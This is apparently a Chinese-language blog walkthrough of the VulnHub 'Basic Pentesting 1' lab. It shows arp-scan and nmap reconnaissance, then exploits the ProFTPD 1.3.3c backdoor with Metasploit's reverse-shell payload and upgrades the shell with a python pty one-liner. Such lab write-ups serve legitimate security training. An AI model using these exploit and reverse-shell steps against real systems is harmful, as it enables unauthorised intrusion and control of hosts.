Basic penetration1

下载地址

https://www.vulnhub.com/entry/basic-pentesting-1,216/

信息收集

主机探测

arp-scan -l

端口扫描

nmap -sS -sV -sC -O -T5 -p- 192.168.0.140

网站探测

发现网站没有什么有用的东西,就再换换思路

漏洞探测

后渗透

在端口扫描发现ProFTPD 1.3.3c 这个版本是有漏洞的

在kali输入 msfconsole命令,进入到该框架内

##这里用到msfconsole,关于msfconsole介绍:msfconsole又叫MSF终端、The Mctasploit Framework,是目前Metasploit框架最流行的用户接口。

 msfconsole

先看看可以利用的脚本,输入 search proftpd 1.3.3

search proftpd 1.3.3

选择用序号2的那一个:use 2;然后查看要设置的参数(show options),使用方法如下:

use 2
show options

设置一下RHOSTS(目标的地址),输入

set RHOSTS 192.168.0.140

设置payload,输入set payload cmd/unix/reverse(反向连接)

set payload cmd/unix/reverse

查看backdoor需要的参数:show options,发现还需要设置一个监听的地址

show options

设置LHOST:set LHOST 192.168.101.10(kali的ip)

set LHOST 192.168.0.132

参数设置完成后,输入run,执行攻击,成功进入getshell

run

漏洞利用

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看当前用户拥有的权限:sudo -l,发现当前用户已经是root

whoami
sudo -l
id

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值